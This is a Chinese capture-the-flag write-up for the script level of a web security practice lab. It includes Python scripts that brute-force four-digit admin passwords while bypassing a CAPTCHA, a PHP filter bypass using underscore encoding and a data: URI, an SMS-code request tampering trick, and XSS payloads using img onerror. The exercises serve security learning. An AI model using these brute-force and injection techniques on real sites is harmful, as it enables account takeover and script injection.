CTF [网络安全实验室] [脚本关]
Posted 热绪
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF [网络安全实验室] [脚本关]相关的知识,希望对你有一定的参考价值。
脚本关
1.key又又找不到了?
emmmm 抓包放包key就出来了,和基础关的差不多。
2.快速口算
试着写下脚本:
# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 10:46
# @Author : rexu
# @File : 2sadd.py
# @Software : PyCharm
import requests,re
s = requests.Session()
url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
html = s.get(url).content.decode('utf-8')
reg = r'([0-9].+)=<'
pattern = re.compile(reg)
match = re.findall(pattern,html)
payload = {'v':eval(match[0])}
print(s.post(url,data=payload).text)
得key!
3.这个题目是空的。
找到可以表示空白的字符串,循环提交,找到成功的。
# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 11:15
# @Author : rexu
# @File : null.py
# @Software : PyCharm
import requests
url = ""
payloads = ["%00","%0a","%0d","%0a","%0d","%0b","%0c","%a0","null","none"]
for i in payloads:
r = requests.get(url,params={'':'i'})
if r.status_code == 200:
print(i)
else:
print("error")
#null是对的4.怎么就是不弹出key呢?
抓包或者F12查看源码如下:
<script>
function alert(a){
return false;
}
document.write=function(){
return false;
}
function prompt(a){
return false;
}
var a=function (){
var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\\'\\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\\'\\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\\'\\\\\\\\w+\\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\\'\\\\\\\\b\\'+e(c)+\\'\\\\\\\\b\\',\\'g\\'),k[c]);1d p}(\\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\\\\'\\\\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\\\\'\\\\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\'+e(c)+\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\',\\\\\\'g\\\\\\'),k[c]);S p}(\\\\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\\\\\\\\'\\\\\\\\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\',\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\'),k[c]);A p}(\\\\\\\\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'),0,{}))\\\\\\\\\\\\\\',H,H,\\\\\\\\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\\\\\\\\'.K(\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\'),0,{}))\\\\\\',X,X,\\\\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\\\\'.14(\\\\\\'|\\\\\\'),0,{}))\\',1t,1u,\\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\\'.1r(\\'|\\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
var d=eval(b);
alert("key is first 14 chars"+d);
}
</script>发现提示:提交前14个字符得到key。源码中有三个扰乱的函数return false;删除前3个函数,在本地重新运行,得到key。
学到了一种新的解题方法。
5.逗比验证法第一期:逗比的验证码,有没有难道不一样吗?
看提示好像是验证码不会变,我们抓包看看。
每次在不改正确的验证码的同时,修改密码,错误回显只有pwd error,的确,这是个逗比验证码;我们进行暴力破解,首先发送到Intruder模块;
1238登录得到key。
使用python脚本进行破解:
# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 12:44
# @Author : rexu
# @File : burp.py
# @Software : PyCharm
import requests
s = requests.Session()
url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Cookie": "PHPSESSID=4fd46a57c9beb76b5fd77aa0ccc954b7" #需要修改。
}
for i in range(1000,10000):
payload = {"username":"admin","pwd":i,"vcode":"PFFQ"} #同样需要修改
r = s.post(url,data=payload,headers=headers)
print(i,r.text)
6.逗比验证码第二期。
这回验证码每次刷新一次就回变一次。
我们发现如果不提交验证码,会回显pwd error ,所以猜测可以改包不输入验证码来绕过。
同样的,使用burp爆破。
使用python:
# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 13:06
# @Author : rexu
# @File : burp2.py
# @Software : PyCharm
import requests
s = requests.Session()
url = "http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
headers = {
"Cookie": "PHPSESSID=4fd46a57c9beb76b5fd77aa0ccc954b7"
}
for i in range(1000,10000):
payload = {"username":"admin","pwd":i,"vcode":""}
r = s.post(url,headers=headers,data=payload)
print(i,r.content)
得key!
7.逗比的验证码第三期。
emmmmm
和第二期的验证码一样逗,不用输入验证码,然后爆破,python脚本也类似。
8.微笑一下就能过关了。
F12查看源码:
查看源代码:
代码审计题:
<?php
header("Content-type: text/html; charset=utf-8");
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
include('flag.php');
$smile = 1;
if (!isset ($_GET['^_^'])) $smile = 0; #^_^不为空
if (preg_match ('/\\./', $_GET['^_^'])) $smile = 0;
if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
#"^_^"的值不能是 . % [0-9] http https ftp telnet
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
#^_^这个字符串不能有 _ 这个字符,所以这里我们编码绕过;_的编码为%5f
if ($smile) {
#满足$smile!=0进入
if (@file_exists ($_GET['^_^'])) $smile = 0;
#file_exists() 函数检查文件或目录是否存在,存在返回1;这里为了不让smile是0,则不能进入循环,则$_GET['^_^']不存在。
}
if ($smile) {
$smile = @file_get_contents ($_GET['^_^']);
if ($smile === "(●'◡'●)") die($flag);
# $smile"必须等于"(●'◡'●)",也就是file_get_contents($_GET['^_^'])必须为"(●'◡'●)"
}
?>
编码后我们的输入为:^%5f^
$_GET['^_^']只能是字符串:(●'◡'●)
输入为:" ^%5f^=data:,(●'◡'●) "
后面又要通过file_get_contents()取出$_GET['^_^']里的值,而$_GET['^_^']又必须不存在。所以$_GET['^_^']只能是字符串"(●'◡'●)",不可能是文件名。那么file_get_contents()里的参数就应该是data:,所以我们输入就应该为" ^%5f^=data:,(●'◡'●) "
http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?^%5f^=data:,(%E2%97%8F%27%E2%97%A1%27%E2%97%8F)
得到key!
9.逗比的手机验证码。
显示登录框:
获取验证码登录后显示:
换手机号登录后发现:
抓包试试。
我们先抓6666结尾的包:
每次重发一回,验证码都会变,在这里我们把6666->6667发现:
发现不行。
我们抓取6667的包;
将这里的6667改为6666,发送:
登录得key
思路:66可得验证码,67不可得验证码,抓取67的包修改为66得验证码,配合67进行登录,找到key。
10.基情燃烧的岁月
进行爆破发现:
登录:
emmmm 使用99登录进行爆破:
登录:
11.验证码识别。
涉及未学到的python库,正在学。
12.xss1-基础
先用:<script>alert(1)</script>
使用:<script>alert(HackingLab)</script>
13.xss2-绕过
使用:<script>alert(HackingLab)</script>发现:
怀疑<script>被过滤;使用<img src=1 οnerrοr=alert(HackingLab)>成功绕过。
14.xss3-构造
F12查看源码,并构造payload如下:
构造闭合:><img src=1 οnerrοr=alert(1)
15.xss5-Principle很重要的XSS
再想想
以上是关于CTF [网络安全实验室] [脚本关]的主要内容,如果未能解决你的问题,请参考以下文章